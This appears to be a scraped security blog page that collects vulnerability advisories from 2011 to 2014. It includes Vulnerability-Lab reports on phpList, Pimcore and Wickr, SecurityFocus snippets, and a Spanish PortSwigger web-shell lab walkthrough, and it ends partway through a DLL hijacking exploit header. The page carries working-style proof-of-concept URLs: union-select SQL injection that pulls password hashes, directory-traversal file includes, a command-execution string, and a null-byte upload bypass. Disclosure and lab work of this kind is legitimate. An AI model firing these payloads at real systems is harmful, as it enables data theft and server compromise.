Document Title:
===============
PHPLIST v3.0.6 & v3.0.10 - SQL Injection Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1358
Release Date:
=============
2014-12-18
Vulnerability Laboratory ID (VL-ID):
====================================
1358
Common Vulnerability Scoring System:
====================================
6.1
Product & Service Introduction:
===============================
phpList is an open source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news,
advertising to list of subscribers. It is written in PHP and uses a MySQL database to store the information. phpList is free and open-source
software subject to the terms of the GNU General Public License (GPL). Most popular open source newsletter manager. Easy permission marketing.
Free to download, easy to install and integrate, Versatile and extensible. Over 10,000 downloads a month.
(Copy of the Vendor Homepage: https://www.phplist.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in the official PHPList v3.0.6 & v3.0.10 web-application.
Vulnerability Disclosure Timeline:
==================================
2014-12-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
PHPList Limited
Product: PHPList - Web Application 3.0.6 - 3.0.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A sql injection web vulnerability has been discovered in the official PHPLIST v3.0.6 & v3.0.10 open source web-application.
The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms.
The sql injection vulnerability is located in the abo user search engine of the phplist application. Local privileged accounts
are able to inject own sql commands by usage of vulnerable findby value in the abo user search module. A successful attack requires
to manipulate a GET method request with vulnerable findby value. The injection is a basic order by sql injection that allows to
compromise the web-application.
The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and no user interaction.
Successful exploitation of the security vulnerability result in web-application and database management system compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Abonnenten suchen > Abonnenten finden > Abonnenten finden
Vulnerable Parameter(s):
[+] findby
Proof of Concept (PoC):
=======================
The sql injection web vulnerability can be exploited by remote attackers with privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Abonnenten suchen > Abonnenten finden > Abonnenten finden
http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0&find=1&findby=-1'[SQL INJECTION VULNERABILITY!]--
--- SQL Error Session Logs ---
Database error 1064 while doing query
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' '' at line 1
Database error 1064 while doing query
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'phplist_user_user.confirmed from phplist_user_user where limit 0,50' at line 1
-
Database error 1054 while doing query Unknown column '10' in 'order clause' Database error 1064 while doing query You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Database error 1064 while doing query You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Database error 1064 while doing query You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
'phplist_user_user.confirmed from phplist_user_user where limit 0,50' at line 1
Reference(s):
http://phplist.127.0.0.1:8080/lists/
http://phplist.127.0.0.1:8080/lists/admin/
http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0
http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0&find=1&findby=1
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the findby parameter in the abo user search module. Encode and parse the input values to prevent sql injection attacks.
Use a prepared statement to secure the point were the app communicates with the local dbms. Disallow that php code errors becomes visible - error(0).
Security Risk:
==============
The security risk of the sql injection web vulnerability in the findby value of the abo user search module is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863228277
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Document Title:
===============
Pimcore v3.0 & v2.3.0 CMS - SQL Injection Vulnerability
References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1363
Release Date:
=============
2014-12-16
Vulnerability Laboratory ID (VL-ID):
====================================
1363
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Pimcore is a powerful and robust Zend Framework based PHP content management system (CMS) for creating and managing digital
content and assets licensed under the open-source BSD license. Create outstanding digital experiences on the most flexible
content management platform available. Manage and edit any type of digital content, for any device and channel in a 100%
flexible and personalized way. Pimcore features award-winning single-source and multi-channel publishing functionality
making it easy to manage, update, and integrate content and data from various sources. With pimcore brands can create
and manage rich digital experiences for all of their output channels at once: web, mobile, apps, social platforms,
print and digital signage. With pimcore you can truly `edit once & reuse anywhere`.
(Copy of the Homepage: https://www.pimcore.org/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in the official Pimcore v3.0 & v2.3.0 Content Management System (Web-Application).
Vulnerability Disclosure Timeline:
==================================
2014-12-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Pimcore GmbH
Product: PimCore - Content Management System 3.0 Release Candidate & 2.3.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Pimcore v3.0 & v2.3.0 Content Management System.
The vulnerability allows remote attackers and local privileged user accounts to inject own sql commands to compromise
the web-server dbms of pimcore.
The security vulnerability is located in the name value GET method request of the pimcore mysql module. Remote attackers
and local privileged user accounts are able to compromise the application service by injection of malicious sql commands. The request
method to inject the code is GET and the attack vector is on the application-side of the modules. Remote attackers are able to use the
inner application functions of the class module to perform an execution on the application-side unauthorized through the admin acp.
The security risk of the sql vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the remote sql injection web vulnerability requires no privileged application user account or a low privileged
user account without user interaction. Successful exploitation of the sql injection vulnerability results in application and
web-service or dbms compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] backup/mysql
Vulnerable Parameter(s):
[+] name
Proof of Concept (PoC):
=======================
The sql injection vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
./backup/mysql?_dc=1415886023081&name=-1%27[SQL INJECTION VULNERABILITY!]--&type=BASE%20TABLE
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://pimcore.localhost:8080/admin/backup/mysql?_dc=1415886023081&name=-1%27[SQL INJECTION VULNERABILITY!]--&type=BASE%20TABLE
Load Flags[VALIDATE_NEVER LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[495] Mime Type[text/html]
Request Header:
Host[pimcore.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Cookie[__utma=59704236.87754243.1415885491.1415885491.1415885491.1;
__utmb=59704236.1.10.1415885491; __utmc=59704236;
__utmz=59704236.1415885491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
pimcore_admin_sid=28vctg6ilpedepa26b81gqeps5]
Connection[keep-alive]
Response Header:
Date[Thu, 13 Nov 2014 13:55:50 GMT]
Server[Apache/2.2.22 (Debian)]
Set-Cookie[pimcore_admin_sid=28vctg6ilpedepa26b81gqeps5; path=/; HttpOnly]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Connection[close]
Content-Encoding[gzip]
X-Powered-By[pimcore]
Content-Length[495]
Content-Type[text/html]
--- Error & Exception Logs ---
Fatal error: Uncaught exception 'Zend_Db_Statement_Mysqli_Exception' with message 'Mysqli prepare error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1'' at line 1'
in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php:77
-
Stack trace: #0 /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM -...')
#1 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Mysqli.php(388): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM -...')
#2 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM -...')
#3 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(737): Zend_Db_Adapter_Abstract->query('SELECT * FROM -...', Array)
#4 [internal function]: Zend_Db_Adapter_Abstract->fetchAll('SELECT * FROM -...') #5 /home/pimcore-service/www/pimcore/lib/Pimcore/Resource/Wrapper.php(230):
call in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php on line 77
-
Fatal error: Call to a member function isAllowed() on a non-object in /home/pimcore-service/www/pimcore/lib/Pimcore/Controller/Action/Admin/Element.php on line 37
-
Fatal error: Uncaught exception 'Zend_Db_Statement_Mysqli_Exception' with message 'Mysqli prepare error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1'' at line 1'
in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php:77
-
Stack trace: #0 /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM -...')
#1 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Mysqli.php(388): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM -...')
#2 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM -...')
#3 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(737): Zend_Db_Adapter_Abstract->query('SELECT * FROM -...', Array)
#4 [internal function]: Zend_Db_Adapter_Abstract->fetchAll('SELECT * FROM -...')
#5 /home/pimcore-service/www/pimcore/lib/Pimcore/Resource/Wrapper.php(230): call in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php on line 77
Solution - Fix & Patch:
=======================
The vulnerability can be patched by implementation of two prepared statements in the section were the vulnerable name value is in usage.
Encode and parse also the qrcode and mysql GET method request to prevent exploitation.
The fix for the backup routine is already in the main trunk and can be reviewed here:
https://github.com/pimcore/pimcore/commit/93067d865affa5a0110ae7e9904cbc5ff5868376
Note: The patch will be part of the next version (RC 2) and the final 3.0 release. You can verify it also by downloading the lastest build from pimcore.org/download.
Security Risk:
==============
The security risk of the sql injection web vulnerability in the pimcore content management system is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1377
Video:
http://www.vulnerability-lab.com/get_content.php?id=1388
Release Date:
=============
2014-12-25
Vulnerability Laboratory ID (VL-ID):
====================================
1377
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and
self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder`
which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage
the data, a practice which is prone to error according to many security experts.
On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition,
a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.
(Copy of the Homepage: https://wickr.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the offical Wickr Desktop v2.2.1 windows software.
Vulnerability Disclosure Timeline:
==================================
2014-12-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wickr Inc.
Product: Wickr - Desktop Software (Windows) 2.2.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) windows software.
The issue allows local attackers to crash or shutdown the software client by usage of special crafted symbole payloads.
The wickr v2.2.1 (msi) software crashs with unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when processing to include
special crafted symbole strings
as password or name. The issue occurs after the input of the payload to the `change name friend contacts`-, `the wickr password auth`-
and the `friends > add friends` input fields. Attackers are able to change the name value of the own profile (payload) to crash the
wickr client. Local attackers can include the payload to the input fields to crash/shutdown the application with unhandled exception.
The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of
the vulnerability results in an application crash or service shutdown.
Vulnerable Module(s):
[+] friend contacts
[+] wickr password auth
[+] friends
Vulnerbale Input(s):
[+] add friends (name)
[+] wickr password auth
[+] change friend (update name)
Vulnerable Parameter(s):
[+] name (value input)
[+] password (vale input)
Proof of Concept (PoC):
=======================
The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Download Wickr v2.2.1 for windows to your windows 8 box (mywickr.info/download.php?p=4)
2. Install the wickr windows version of the software to your windows 8 box
3. Create an new account and include the payload to the password input field
Note: After the payload has been processed to the auth, the software crashs. You should attach a debugger ago.
4. Successful reproduce of the first issue!
5. We register a new account with regular values
6. Open the friends > add friends section and include the payload to the search input value
Note: After the payload has been processed to add the friend, the software crashs. You should attach a debugger ago.
7. Successful reproduce of the second issue!
8. We open the software again and login. Switch to the existing friends contacts and edit the profile
9. Include in the name values the payload and save the settings
Note: After the payload has been processed to change to the name, the software crashs. You should attach a debugger ago.
4. Successful reproduce of the third issue!
Payload: Denial of Service
็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็
--- Error Report Logs ---
EventType=APPCRASH
EventTime=130628671359850105
ReportType=2
Consent=1
UploadTime=130628671360390638
ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
WOW64=1
NsAppName=Wickr.exe
Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
Response.BucketTable=1
Response.LegacyBucketId=73726044048
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Wickr.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=0.0.0.0
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=02849d78
Sig[3].Name=Fehlermodulname
Sig[3].Value=CFLite.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=53f6c178
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00027966
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=5861
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=84a0
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
UI[3]=Wickr.exe funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
... ... ... ...
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Wickr.exe
AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
NsPartner=windows
NsGroup=windows8
ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE
Security Risk:
==============
The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
source: https://www.securityfocus.com/bid/47390/info
Technicolor THOMSON TG585v7 Wireless Router is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attackers may exploit this issue by enticing victims into visiting a malicious site.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Firmware versions prior to 8.2.7.6 are vulnerable.
http://www.example.com/cgi/b/ic/connect/?url=[XSS]
source: https://www.securityfocus.com/bid/47394/info
4images is prone to multiple remote file-include vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer in the context of the webserver process or compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control.
4images 1.7.9 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/download.php?file_path=[Ev!l-Sh3ll]
http://www.example.com/[path]/categories.php?upload_url=[Ev!l-Sh3ll]
http://www.example.com/[path]/global.php?config=[Ev!l-Sh3ll
http://www.example.com/[path]/details.php?cat_id_sql=0+AND+2=1
source: https://www.securityfocus.com/bid/47389/info
PhoenixCMS is prone to a local file-include vulnerability and an SQL-injection vulnerability.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PhoenixCMS 1.7.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/modules.php?name=Work_Probe&file=../../WS_FTP.LOG%00
http://www.example.com/[path]/modules.php?name=News&file=../../WS_FTP.LOG%00
http://www.example.com/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--
source: https://www.securityfocus.com/bid/47388/info
The RunCMS 'partners' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/modules/partners/index.php?op=visit_partner&id=1+and+2=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
source: https://www.securityfocus.com/bid/47375/info
Qianbo Enterprise Web Site Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com]/en/Search.Asp?Range=Product&Keyword=[xss]
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Web shell upload via obfuscated file extension”.
Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo.
Además, el servidor está configurado para que no acepte ciertas extensiones.
En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo:
Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta:
Una vez estamos en el perfil, como vemos, tenemos un campo de subida de archivos para actualizar el avatar de nuestra cuenta. Vamos a intentar aprovecharnos de esto para subir el siguiente archivo:
Antes que nada, vamos a preparar el burp suite para que intercepte las peticiones:
Una vez tenemos esta parte configurada, subimos el archivo:
Burp suite interceptará la petición de subida:
Para tratar mejor con el proceso de subida de archivos, vamos a pasar la petición al repeater pulsando Ctrl R:
Como vemos, en este caso, al darle al Send, vemos en la respuesta del servidor que solo los archivos JPG y PNG están permitidos.
Por lo que la idea va a ser introducir una doble extensión junto a un null byte para ver si podemos bypasear esta restricción:
Al enviar la petición, vemos como en la respuesta, el archivo se ha subido, no solo eso, sino que gracias al null byte, nos hemos desecho de la segunda extensión que habiamos puesto (.jpg). Por lo que con esto hecho, vamos a ver la respuesta en el navegador:
Ya no vamos a usar burp suite, por lo que desactivamos el proxy:
Una vez desactivado, nos volvemos a nuestro perfil:
Como vemos, el avatar se ha establecido, sin embargo, parece que ha ocurrido un fallo al cargar la imagen. Probablemente porque intenta cargar nuestro archivo PHP como si fuese una imagen y por eso falla. Vamos a acceder a la ruta directa de “la imagen” dandole click derecho:
Parece que nos da un problema, sin embargo, si nos fijamos en la URL, se nos intenta cargar el archivo readSecret.php%00.jpg, cuando realmente, el archivo resultante fue readSecret.php. Por lo que cambiamos la URL para acceder a este último archivo:
Y de esta forma, accedemos al código PHP y se interpreta, consiguiendo así que leamos el archivo secret.
Habiéndolo leído, ya simplemente enviamos la solución:
Y de esta forma, completamos el laboratorio:
source: https://www.securityfocus.com/bid/47369/info
PhpAlbum.net is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable process.
PhpAlbum.net 0.4.1-14_fix06 is vulnerable; other versions may also be affected.
http://www.example.com/main.php?cmd=setup&var1=user&var3=1-file_put_contents('./x.xxx','xxxx')
source: https://www.securityfocus.com/bid/47371/info
Agahi Advertisement CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Agahi Advertisement CMS 4.0 is vulnerable; other versions may also be affected.
http:/www.example.com/view_ad.php?id=-523+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
// source: https://www.securityfocus.com/bid/47349/info
EC Software Help & Manual is prone to an arbitrary-code-execution vulnerability.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Help & Manual 5.5.1 Build 1296 is vulnerable; other versions may also be affected.
/*
Help & Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit
Vendor: EC Software GmbH
Product web page: http://www.helpandmanual.com
Affected version: 5.5.1 Build 1296
Summary: Help & Manual 5 is a single-source help authoring and content
management system for both single and multi-author editing.
Desc: Help & Manual suffers from a DLL hijacking vulnerability that enables
the attacker to execute arbitrary code on the affected machine. The vulnerable
extensions are hmxz, hmxp, hmskin, hmx, hm3, hpj, hlp and chm thru ijl15.dll
Intel's library.
Tested on: Microsoft Windows XP Professional SP3 EN
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5009
